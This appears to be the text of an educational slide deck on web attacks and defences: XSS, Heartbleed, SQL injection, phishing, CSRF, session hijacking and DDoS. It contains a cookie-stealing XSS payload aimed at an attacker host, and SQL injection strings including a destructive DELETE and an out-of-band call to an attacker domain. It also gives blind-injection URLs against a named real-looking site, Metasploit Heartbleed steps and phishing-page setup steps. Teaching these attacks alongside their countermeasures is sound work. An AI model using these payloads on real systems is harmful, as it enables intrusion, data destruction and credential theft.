  • 18. STROKEJACKING It is extremely similar to clickjacking, in that a malicious site has a user doing things they don’t want to do. Except, this time, it’s with the keyboard instead of the mouse – hence the “stroke”. The attacking site gets the user to type (or cut and paste), the information they’re looking for. This could lead to another attack (if the user types JavaScript), or just gathering a username and password. The user thinks they are logging into a site, but they’re really sending characters over to the attacker’s site. TAPJACKING • A hacking technique where a malicious application presents an unreal user interface in order to obtain user events for a hidden action in the background. • Like Clickjacking on the web, Tap Jacking occurs when a malicious application displays a fake user interface that seems like it can be interacted with, but actually passes interaction events such as finger taps to a hidden user interface behind it. • Mostly the tap jacking technique is used for mobile application and mobile websites
  • 21. Tools and Techniques Required to Perform Attacks  WHOIS  Robots.txt files  HTTrack-clone a website  BeEF Tool  Electronic Data Gathering, Analysis and Retrieval (EDGAR)  Shodan Search  Google Hacking  DNS Lookup  Nslookup  DIG (Domain information Groper)  Netcraft  Httprint  Fierce  Encoder and Decoder
  • 24. XSS
  • 25. Content  Definition  Types  Process  Live Attack  Risks  Counter Measures
  • 26. Definition  Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications.  XSS enables attackers to inject client-side scripts into web pages viewed by other users.  A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
  • 27. XSS Types  Persistent (Stored) Stored or Persistent XSS is a kind of XSS vulnerability where the untrusted user input is processed and stored by the server in a file or database without any validation and this untrusted data is fetched from the storage and is reflected back in response without encoding or escaping resulting in permanent code execution at the browser whenever the stored data is reflected in the response. - link in other website or email
  • 28. XSS Types  Non Persistent (Reflected) Reflected or Non-Persistent XSS is a kind of XSS vulnerability where the untrusted user input is immediately processed by the server without any validation and is reflected back in the response without encoding or escaping resulting in code execution at the browser. - forum, bulletin board, feedback form
  • 29. XSS Types  Local (DOM based) DOM Based XSS is a form of client side XSS which occurs in an environment where the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. It occurs when an untrusted data is given at the source is executed as a result of modifying the DOM “environment” in the browser. DOM XSS occurs when the untrusted data is not in escaped or encoded form with respect to the context. - PDF Adobe Reader, Flash Player
  • 31. Screenshot 1)An attacker finds an xss hole in a web application
  • 32. 2) The attacker creates an attack URL for stealing sensitive Information and disguises it so that it appears legitimate. Here it is, <script> document.location = ”http://localhost/attacker.com/redirect.php?a=” + document.cookie</script> 3) The attacker distributes the malicious XSS link via social engineering to unsuspected users.
  • 33. Screenshot 4) When the victim logs in, Javascript embedded with the malicious XSS link executes and transmits the victim’s login information to the attacker.
  • 35. XSS Risks XSS can 1) Steal Cookies - Hijack of user’s session - Unauthorized acess 2)Spy on what you do 3)Modify the content of web page by - Inserting images or words - Misinforming - Spreading Bad Reputation 4)Network Mapping 5)XSS viruses
  • 36. XSS Countermeasures 1) Content Filtering: “The application may attempt to detect and remove all scripts from un- trusted HTML before sending it to the browser.” Content filtering is otherwise known as sanitization. This defense technique uses filter functions to remove potentially malicious data or instructions from user input. Filter functions are applied after user input is read by a web application, but before the input is employed in a operation or output to the web browser. Removal of scripts from un-trusted content is a difficult problem for web applications that permit HTML markup in user input such as blog. To be completely effective in eliminating XSS, a filter function must necessarily model the full range of parsing behaviors pertaining to script execution for several browsers.
  • 37. XSS Countermeasures Challenges of Content Filtering: Allowing all benign HTML user input, while simultaneously blocking all potentially harmful scripts in the un-trusted output. Every control character that can be used to introduce attack code also has a legitimate use in some benign, non-script context. For example, the ' < ' character needs to be present in hyperlinks and text formatting, and the ' " ' character needs to be present in generic text content. Both are legitimate and allowed user inputs, but can be abused to mount XSS attacks. Browser behavior vary from browser to browser, they are complex to model, not entirely understood and not all known (especially for closed source browsers like Microsoft internet explorer). Therefore, from a web application perspective, the task of implementing correct and complete content filter functions is very difficult, if not impossible.
  • 38. XSS Countermeasures 2) Browser Collaboration: “The application may collaborate with the browser by indicating which scripts in the web page are authorized, leaving the browser to ensure the authorization policy is upheld.” Robust prevention of XSS attacks can be achieved if web browsers are made capable of distinguishing authorized from unauthorized scripts. This approach can be implemented by (a) creating a server–browser collaboration protocol to communicate the set of authorized scripts, then (b) modifying the browser to understand this protocol and enforce a policy denying unauthorized script execution.
  • 39. XSS Countermeasures Challenges of Browser Collaboration: Although this defense strategy is compelling and effective long term solution, but its implementation will take long time because web applications adopting this approach require their users to employ modified browsers for protection from XSS attacks. To implement this there must be agreement on some standards for server browser collaboration, then these new standards must be incorporated in the normal browser implementation. This is a long, complicated process that can take several years. Ex: Browser-Enforced Embedded Policies (BEEP)
  • 41. Heartbleed is a security bug in the OpenSSL cryptography library.
  • 42. OpenSSL is a software library to be used in applications that need to secure communications over computer networks against eavesdropping or need to ascertain the identity of the party at the other end. It has found wide use in internet web servers, serving a majority of all web sites. OpenSSL contains an open-source implementation of the SSL and TLS protocols.
  • 44. The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) is the most widely deployed security protocol used today. It is essentially a protocol that provides a secure channel between two machines operating over the Internet or an internal network.
  • 45. What happened..??  Vulnerability Heartbleed was announced to the world on 7th April 2014, as OpenSSL vulnerability and with a new code release ( 1.0.1g)  It was found by Google security Team and Condenomicon  Told that Private keys to SSL certificates could be exposed  Many Big name companies were vulnerable; Big tech names, Banks, law enforcement, Intelligence Agencies  But...
  • 46. What is heartbeat extension?  Heartbeat is an echo functionality where either side (client or server) requests that a number of bytes of data that it sends to the other side be echoed back.  The idea appears to be that this can be used as a keep- alive feature, with the echo functionality presumably meant to allow verifying that both ends continue to correctly handle encryption and decryption
  • 48. Background The Heartbleed vulnerability is possibly the worst thing that ever happened to online trust. Ironically, Heartbleed makes HTTPS less secure than plain HTTP because attackers can obtain sensitive data without even having to intercept traffic. Initial reactions focused on : • patching vulnerable web servers, • revoking SSL certificates • changing user passwords. It took a couple more days to realize that Heartbleed also affects client software, non-web SSL traffic and countless embedded devices which will never receive a software update.
  • 49. Lets see how to perform this attack with Metasploit..!!
  • 50.  It can be performed with powerful exploit framework, Metasploit  We'll see how it's performed step by step  Step 1: Update Metasploit using msfupdate  Step 2: Start metasploit  Kali > msfconsole
  • 52.  Step 3 : Find Heartbleed  search heartbleed  This would bring up two modules  auxiliary/scanner/ssl/openssl_heartbleed  and  auxiliary.server/openssl_heartbeat_client_me mory  We'll use first one
  • 54. Step 4  Use Auxiliary module  use auxiliary/scanner/ssl/openssl_heartbleed  This will load the heartbleed module
  • 55. info  Type msf > info  This reveals the options that need to set in order to use this module and a description of the module
  • 57. Step 5  Set options  Although this module has numerous option, the critical one is RHOSTS  Let's set it to a target website on network that is still vulnerable to heartbleed  msf > set RHOSTS 192.168.1.169
  • 59. Step 6 : Run the module  Finally, set the option 'verbos' to 'true'. This will provide us with verbos output. Msf > set verbos true  And lets run it msf > run  As we can see in next screenshot , the server leaked about 64k bytes of what was in it's memory
  • 61. Let Us Define…. • Alice, Bob: Users of online services. • Eve: A passive attacker (eavesdropper). • Trudy: An active attacker who may exploit the Heartbleed bug by sending specially crafted heartbeat packets over an SSL (e.g.HTTPS) connection. • yuri.com: A web site with vulnerable SSL software. Since OpenSSL is so widely used, any web site should be considered as a potential yuri.com until proven otherwise.
  • 63. 1 Extraction of sensitive data from vulnerable HTTPS servers In this scenario Alice enters or consults sensitive data on yuri.com over HTTPS. Plain-text data linger in the memory of the web server. Later, Trudy connects as a regular HTTPS clients and exploits Heartbleed. Countermeasures for end users • Do not exchange sensitive information with a web site until they tell you they have dealt with Heartbleed. Field reports • Canadian charged in 'Heartbleed' attack on tax agency.
  • 64. 2. Session hijacking from vulnerable HTTPS servers In this scenario Trudy extracts session cookies rather than login credentials. This allows her to take control of Alice's account without waiting for her to enter her credentials. Countermeasures for end users • Log out of online services until they have dealt with Heartbleed.
  • 65. 3. Extraction of SSL private keys from vulnerable HTTPS servers In this scenario Trudy extracts the SSL/TLS private key of yuri.com. Regardless of what happens next, leakage of private keys is always a major failure. Lessons learned • Protect private keys with a hardware security module. Field reports • Confirmed: Heartbleed Exposes Web Server's Private SSL Keys
  • 66. 5. Tor traffic correlation Eve, an evil dictator, wants to establish that Alice is using Tor to communicate with george.com, a foreign human- rights organization. Eve can spy on all Internet traffic within her national boundaries but has no wiretapping authority in other countries. She exploits Heartbleed massively against vulnerable Tor exit nodes in order to match outgoing traffic with her local intercepts.
  • 67. 4. Man-in-the-middle impersonation of online services In this scenario mallory.com impersonates yuri.com after extracting its SSL private key. This so-called man-in-the- middle attack (MITM) is more dangerous than passive snooping because mallory.com can trick Alice into using a compromised certificate. It also allows mallory.com to defeat some multi-factor security measures. Countermeasures for end users • Check whether your browser detects revoked certificates. • If it does not, inspect certificates manually. Lessons learned • Heartbleed will probably be the end of the current certificate revocation infrastructure.
  • 68. 6. De-anonymization of hidden servers and users by malicious Tor nodes Trudy sets up a number of malicious Tor guard node. She exploits the Heartbleed vulnerability against clients that connects to them, including Tor hidden servers and their users. Although Tor hidden services are encrypted end-to- end, Trudy can identify vulnerable users and servers based on plaintext data leaked by Heartbleed at each end. Besides, if she extracts the private key of a hidden service, she can impersonate it. Field reports • "Tor hidden services might leak their long-term hidden service identity keys to their guard relays."
  • 69. 7. Attacks against VPN servers Alice is aware that most public WiFi networks provide no privacy. Therefore she has configured her smartphone and laptop to connect to the Internet through a VPN service provider, yuri.com. (Alternatively, she could be running her own VPN server at home, or using the VPN feature that comes bundled with her DSL modem or her NAS box.) Eve snoops on the WiFi network that Alice is currently using, notices SSL-based VPN traffic from her smartphone, exploits Heartbleed against the destination IP address, and retrieves either VPN keys or plaintext traffic. Field reports • Attackers Exploit the Heartbleed OpenSSL Vulnerability to Circumvent Multi-factor Authentication on VPNs • OpenVPN uses OpenSSL as its crypto library by default and thus is affected
  • 70. Some General Countermeasures  Do not use OpenSSL 1.0.1f.  Disable heartbeat extension.  Change login credentials if your site is compromised.
  • 71. DANGER : OpenSSL, an open source project staffed by only 10 individuals and run on a limited budget, is used to secure millions of servers, ensuring the integrity of email, e- commerce, online banking and other properties, in many cases for multi-billion dollar companies. Heartbleed obviously has wide-reaching implications, not only for the integrity of the Web, but also for mobile apps – but how much damage did it actually do prior to its discovery and patching?
  • 72. How damaging is Heartbleed?
  • 73. The issue has also spread to mobile devices. Android apps, for instance, may connect to servers that could be affected by Heartbleed. While not dedicated browsing tools such as Google Chrome or Apple Safari, some of these apps have their own internal browsers, blurring the line between mobile software and the Web. That risk is worth noting, not just for the OpenSSL exploit but for future considerations about overall Internet security.
  • 75. These weaknesses are all addressable, and the speed with which companies and security experts have acted has been encouraging. Still, the community will have to stay on its toes to protect the emerging Internet of Everything from OpenSSL and future bugs.
  • 77. What is SQL? SQL (Structures Query Language) is a programming language to manage database. The managements systems that employ SQL are Microsoft SQL Database, Oracle, MySQL, PostgreSQL, and others.
  • 78. What is SQL Injection SQL injection i.e. SQLI refers to the injection attack in which the attacker executes malicious SQL queries that control a web application database server The attacker can use SQL injection to :  Add, delete, edit or read content from the database  Read source code from files on the database server  Write files to the database server
  • 79. Classification of SQL injections There are 3 major classifications: 1. In-band SQLi (Classic SQLi) 2. Inferential SQLi (Blind SQLi) 3. Out-of-band SQLi
  • 80. In-Band SQLi Or Classic Attacks Most attacks rely on basic SQL manipulation and are considered to be classic attacks. It includes  WHERE clause modification  UNION operator injection  query stacking
  • 81. WHERE Clause Manipulation: Any user input generally end up in a WHERE Clause of the data base Example: In a login page where username is entered the SQL query looks like this:  SELECT * FROM users WHERE name = '" + userName + "';  if the "userName" variable is crafted in a specific way,the SQL statement may do more than the code author intended.setting the "userName" variable as: ' OR '1'='1  or using comments to even block the rest of the query ' OR '1'='1' – These user inputs renders the SQL Query like the following  SELECT * FROM users WHERE name = '' OR '1'='1';  SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
  • 83. SQL injection Using UNION: The UNION operator allows the attacker to extract sensitive information from the database.  Example: USER INPUT:  ' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a GENERATED QUERY:  SELECT id, name, description FROM products WHERE category = '' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a‘ The crafted query returns usernames and passwords of all members in the database.
  • 84.  Query stacking:Stacked queries provide a lot of control to the attacker. By terminating the original query and adding a new one, it will be possible to modify data and call stored procedures.  Example A classic attack using this technique could look like the following. MALICIOUS USER INPUT:  1; DELETE FROM products GENERATED QUERY WITH MULTIPLE STATEMENTS:  SELECT * FROM products WHERE productid=1; DELETE FROM products
  • 85. Inference SQLi attack The main intent of the attacker in an inference SQLi is identifying the injectable parameters, extracting database schema. Here no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band. It is also referred as Blind injection attack There are two well-known attack techniques that are based on inference:  Boolean-Based-Blind Injection  Time-based-blind Attacks
  • 86. Boolean-based-Blind Injection: Information is inferred from the behaviour of the page by asking the server true/-false questions. If the injected statement evaluates to true, the site continues to function normally. If the statement evaluates to false, although there is no descriptive error message, the page differs significantly from the normally-functioning page. Example: In this website it shows some information which is stored in some database http://www.psn.com.pk/index.php?page=gallery.php&id=519 The attacker finds the vulnerability using Boolean based blind injection False query: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2 True query: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1
  • 89. Timed-based-blind attack: For Time-based attacks, the attacker needs to instruct the database to perform a time-intensive operation. If the web site does not return a response immediately, the web application is vulnerable to Blind SQL Injection. A popular time intensive operation is the sleep operation. Example: In the website http://www.psn.com.pk/index.php?page=gallery.php&id=519 To perform time based blind attack the query will become: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1, sleep(10), false)
  • 91. Out-of-band SQLi  Out-of-band attack occurs when the attacker is unable to the same channel to attack and gather result  Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable. Consider the following URL crafted by an attacker: https://example.com/products.aspx?id=1;EXECmaster..xp_dirtree 'test.attacker.com' – This will produce the following SQL query.  SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree 'test.attacker.com' --
  • 92.  What happened is that there are now two separated queries that SQL Server will execute. /* First Query */  SELECT * FROM products WHERE id=1 /* Second Query */  EXEC master..xp_dirtree 'test.attacker.com' –  The second query is invoking a stored procedure xp_dirtree. This extended stored procedure can be used to get a list of all the folders for the folder named in the xp.
  • 95. SQL Injection (SQLi) SQL INJECTION (SQLI) REFERS TO AN INJECTION ATTACK WHEREIN AN ATTACKER CAN EXECUTE MALICIOUS SQL STATEMENTS (ALSO COMMONLY REFERRED TO AS A MALICIOUS PAYLOAD) THAT CONTROL A WEB APPLICATION’S DATABASE SERVER (ALSO COMMONLY REFERRED TO AS A RELATIONAL DATABASE MANAGEMENT SYSTEM – RDBMS).
  • 96. How SQL Injection works  SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’  # Define POST variables  uname = request.POST['username']  passwd = request.POST['password’]  # SQL query vulnerable to SQLi  sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND password=’” + passwd + “’”  # Execute the SQL statement  database.execute(sql)
  • 97. What’s the worst an attacker can do with SQL?  bypass authentication or even impersonate specific users.  allow the complete disclosure of data residing on a database server.  data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.  to delete records from a database  to allow arbitrary execution of operating system commands on the database server
  • 98. What is a SQL Injection Vulnerability?  Non-Technical Explanation  Drive through <route> and <where should the bus stop?> if <when should the bus stop?>.  Drive through route 66 and stop on bus stops if there are people on the bus stops.  Drive through route 66 and do not stop on bus stops and ignore the rest of this form. if there are people on the bus stop.
  • 99. What is a SQL Injection Vulnerability?  Technical Explanation  $statement = "SELECT * FROM users WHERE username = 'bob' AND password = 'mysecretpw’”  $statement = "SELECT * FROM users WHERE username = '$user' AND password = '$password'";
  • 100. Different Types of the SQL Injection Vulnerability  Error based SQL Injection  Boolean Based SQL Injection  Time based SQL Injection  Out-of-Band SQL Injection Vulnerability
  • 101. Impacts of the SQL Injection Vulnerability  Add, delete, edit or read content from the database  Read source code from files on the database server  Write files to the database server
  • 102. Preventing SQL Injection Vulnerabilities  Server side scripting languages are not able to determine whether or not the SQL query string is malformed; all they can do is send a string to the database server and wait for the interpreted response  when developing web applications you should use prepared statements to prevent SQL injections. When using prepared statements the structure and data are separated and can be interpreted by the sql server without risking that an attacker is able to change the structure of the SQL query for malicious purposes
  • 103. What Can Be Done to Prevent SQL Injection Attacks?  sanitization  validation
  • 104. Sanitization  Sanitization usually involves running any submitted data through a function (such as MySQL's mysql_real_escape_string() function) to ensure that any dangerous characters (like " ' ") are not passed to a SQL query in data.
  • 105. Validation  attempts to ensure that the data submitted is in the form that is expected. At the most basic level this includes ensuring that e-mail addresses contain an "@" sign, that only digits are supplied when integer data is expected, and that the length of a piece of data submitted is not longer than the maximum expected length Two ways:  by blacklisting dangerous or unwanted characters (although hackers can often get around blacklists)  by whitelisting only those characters that are allowed in a given circumstance, which can involve more work on the part of the programmer
  • 106. Others way of prevention  Trust no-one  Don't use dynamic SQL when it can be avoid  Firewall  Update and patch  Reduce your attack surface  Use appropriate privileges  Keep your secrets secret  Don't divulge more information than you need it
  • 108. Phreaking + Fishing = Phishing {Phreaking = making phone calls for free back in 70’s} Phishing is the act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. What is Phishing ?
  • 111.  Spear Phishing  Clone Phishing  Whaling ___________________________________________________________ Spear Phishing Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success. This technique is by far the most successful on the internet today, accounting for 91% of attacks. Phishing Types
  • 112. Clone Phishing A type of phishing attack where a legitimate, email containing an attachment or link has had its content and recipient address taken and used to create an almost identical or cloned email. The attachment or Link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a re-send of the original or an updated version to the original. Whaling Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks.
  • 113. Place your screenshot here Step: 1 Setting Up A Web Page Which Looks Similar To The Original One. Link : http://a0145877.xs ph.ru/ HERE’S HOW IT’S DONE
  • 114. Place your screenshot here Step: 2 A php script which stores credentials to a file is what required to harvest credentials
  • 115. Place your screenshot here Step: 3 In the html page search for submit form and change it to written php script
  • 116. STEP: 4 Host it in a server & Share The Link
  • 118. 118
  • 119. 119
  • 121. It is the attempt to obtain sensitive information such as usernames, passwords, and credit card details, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. DEFINITION TYPES OF PHISHING • Spear phishing • Clone phishing • Whaling • Filter evasion • Link manipulation • Tabnabbing
  • 125. 1. Be wary of emails asking for confidential information 2. Make sure you familiarise yourself with a website's privacy policy 3. Watch out for generic-looking requests for information. 4. Never submit confidential information via forms embedded within email messages. 5. Never use links in an email to connect to a website unless you are absolutely sure they are authentic. Instead, open a new browser window and type the URL directly into the address bar 6. Make sure you maintain effective software to combat phishing How to protect yourself
  • 127. Auto-Generate Domain-Specific Password Hashing of passwords with a secret key along with website domain name.
  • 128. Auto-Generate Domain-Specific Password Due to this mechanism, it becomes really hard for the attacker to get the password.
  • 129. Auto-Generate Domain-Specific Password Disadvantage • Practical implementation is quite difficult. • Many banks use multiple domains and sub- domains • It’s a static solution
  • 130. Web Browser’s PWD Database Random passwords are generated and stored in the browsers. It is more “secure,” as the browser will only give the credentials to the right URL. If anything changes in the URL, it won’t pass credentials Disadvantage- •It doesn’t work fully with sub-domains. •Even here, passwords are stored in plain text.
  • 131. Phishing Scam Alert Add- ons/Extensions The concept is like this. If server visits any known fake/phishing URL, then that tool bar turns red.
  • 132. Phishing Scam Alert Add- ons/Extensions If that phishing or fake site is the one suspect site, then it turns yellow.
  • 133. 2FA—Two-Factor Authentication It requires not only a username and password, but also some piece of information that only the user knows (physical token).
  • 134. Encrypted Key Exchange Process—Prevent Dictionary Attacks Series of protocols are implemented for encrypted key exchange. This key is generated by combining the shared password. This process takes place in such a way that the phisher can’t guess it. These protocols were awkward to implement and use and they were also too time-consuming.
  • 135. Educating Your People Conducting seminars and workshops on ethical hacking and Internet security in order to educate their employees. This can be a quality step towards security awareness. Logical awareness has to be raised.
  • 136. CSRF
  • 137. Content  Definition  Attack Process  Screenshots  CounterMeasures  Tools  References
  • 138. Definition  Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.  CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.
  • 139. Definition Cont...  With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.  If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth.  If the victim is an administrative account, CSRF can compromise the entire web application.
  • 140. Process  Root cause of CSRF  Existing browsers do not check whether a client actually initiates an HTTP request 140 Malicious Website Browser Target Website Send login request Send forged request with cookies Return login response with cookies Visit malicious website Return malicious code
  • 141. Screenshot Step 1 − Let us perform a CSRF forgery by embedding a Java script into an image. The snapshot of the problem is listed below.
  • 142. Screenshot Step 2 − Now we need to mock up the transfer into a 1x1 image and make the victim to click on the same.
  • 143. Screenshot Step 3 − Upon submitting the message, the message is displayed as highlighted below.
  • 144. Screenshot Step 4 − Now if the victim clicks the following URL, the transfer is executed, which can be found intercepting the user action using burp suite. We are able to see the transfer by spotting it in Get message as shown below – Step 5 − Now upon clicking refresh, the lesson completion mark is shown.
  • 145. Tool – OWASP CSRF Tester Test your applications for CSRF -Record and replay transactions -Tune the recorded test case -Run test case with exported HTML document Test case alternatives -Auto-Posting Forms -Evil iFrame -IMG Tag -XMLHTTPRequest -Link
  • 146. Counter Measures  Web application should insert random values, tied to the specified user’s session, into the forms it generates  Web application should re-authenticate every time when users are about to perform a particularly dangerous operation
  • 147. Counter Measures Cont.. Safe Methods 1) The GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe" ... $_POST superglobal and not $_GET or $_REQUEST 2)Try to force the use of your own forms - On form generation, store unique token in user $_SESSION and form hidden field - On submit, check token -- Limits attack to only single user -- Attacker would need to obtain users valid form AND session token - Put expiry on form tokens
  • 149. What is session hijacking ? Session hijacking is the process of exploiting valid computer session which involves stealing the victim's cookie.
  • 150. What is a cookie ? • A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser. • A cookie is sent as an header by the web server to the web browser on the client side. • A cookie is static and is sent back by the browser unchanged every time it accesses the server.
  • 151. Types of session hijacking 1 ) Active : - In active attack, an attackers finds an active session and takes over. 2 ) Passive : - With passive attack, an attacker hijacks a session, but sits back, and watches and record all the traffic that is being send forth
  • 154. Showing video example of session hijacking
  • 156. Session Hijacking Levels of Session Hijacking Session Hijacking ToolsSession Hijacking Steps CountermeasuresTypes Of Session Hijacking
  • 157. Steps in Session Hijacking Place yourself between the victim and the target (you must be able to sniff the network) Monitor the flow of packets Predict the sequence number Kill the connection to the victim’s machine Take over the session Start injecting packets to the target server
  • 158. Types of Session Hijacking There are two types of session hijacking attacks: Active • In an active attack, an attacker finds an active session and takes over Passive • With passive attack, an attacker hijacks a session, but sits back, and watches and records all the traffic that is being sent forth
  • 159. Session Hijacking Levels Session hijacking takes place at two levels: • Network Level Hijacking • Application level Hijacking Network level can be defined as the interception of the packets during the transmission between client and the server in a TCP and UDP session Application level is about gaining control on HTTP user session by obtaining the session ID’s
  • 160. Some common tools used for Session Hijacking The following are a few that belong to this category: • Juggernaut • Hunt • TTY Watcher • IP Watcher • T-Sight • Paros HTTP Hijacker
  • 161. Counter Measures for Session Hijacking Use Encryption Use Secure protocol(SSL and HTTPS) Limit incoming connections where possible Minimize remote access Set a time out for the expiry of the session when inactive Expiry of session if the agent if browsing changes Logout Functionality
  • 162. Counter Measures for Session Hijacking (Cont….) ID creation after authoritative login Long session ID’s Forcing re-authentication or set- up authentication Captcha prevention Educate the employees Expiry of session if the operating system changes Expiry of the session if the device changes(Web Socket)
  • 164. What is Distributed Denial of Service?  A denial-of-service attack (DoS attack) is a cyber-attack where the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
  • 167. Volume Based Attacks  Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second (Bps).
  • 168. Protocol Attacks  Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment, such as firewalls and load balancers, and is measured in Packets per second.
  • 169. Application Layer Attacks  Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in Requests per second.
  • 171. Prevention and Mitigation Strategy  The first things to do in DDoS mitigation is to identify normal conditions for network traffic by defining “traffic patterns”, which is necessary for threat detection and alerting. DDoS mitigation also requires identifying incoming traffic to separate human traffic from human-like bots and hijacked web browsers. The process is done by comparing signatures and examining different attributes of the traffic, including IP addresses, cookie variations, HTTP headers, and Javascript footprints.  One technique is to pass network traffic addressed to a potential target network through high-capacity networks with "traffic scrubbing" filters.
  • 173. INVESTIGATION Challenges in the investigation of Cyber Crime (Website Crime) Investigation of Cyber-crimes are different from conventional investigation as:  Incident taking place in Virtual World  Borderless/Transnational  Issues of jurisdiction  Issue of connecting the accused with the machine/computer  Lack of enthusiasm in reporting Cyber crime
  • 174. The essential Requirements for Investigation are:  Immediate Reporting of Breaches.  Adequate Tools.  Trained Investigators.  Computer Literate Witness.  Assistance of Forensic Experts.  Immediate investigation. Common Procedure of Web Site Crime investigation  Who is., Domain Detail,If domain is active then it must have working email address and payment detail, contact registrar, Registrar can give Domain IP address and cell number and payment instrument. 17 4
  • 175.  Email ID used for Sell hosting server is important because police can get email id, creation IP, alternate email ID, Cell number, IP logs.  An Law Enforcement Agency of the India can demands the information like IP Logs, Login credentials of the accused for investigation through Section 91 of CRPC 1973, for detailed information of Section 91 of CRPC 1973 kindly refer annexure.  The Law Enforcement agencies can perform detailed investigation of the Cyber Crime cases through the Internet Protocol Data Record (IPDR) of the used network. The IPDR can be obtained from the ISP of the concerned network. The Sample of the IPDR is shown in figure. 17 5
  • 176. FIGURE : Sample Of Notice under 91 Crpc 1973.
  • 177. Figure : Sample of IPDR
  • 178. Crimes and Laws Relating to Website.  Harassment via fake public profile on social networking site.  Online Hate Community.  Email Account Hacking.  Web Defacement.  Introducing Viruses, Worms, Backdoors, Rootkits, Trojans, Bugs.  Cyber Terrorism.  Phishing and Email Scams.  Theft of Confidential Information.
  • 179. WEBSITE HACKING CASE STUDY  Hacking and defacement of Assam police website.  Hacker hacks into a financial website.  Indian Army website hacked.  ISRO Website Hack.  Bazee.com  E-Bay Account Takeover  Incometaxpune.Com Redirection To Pornographic Content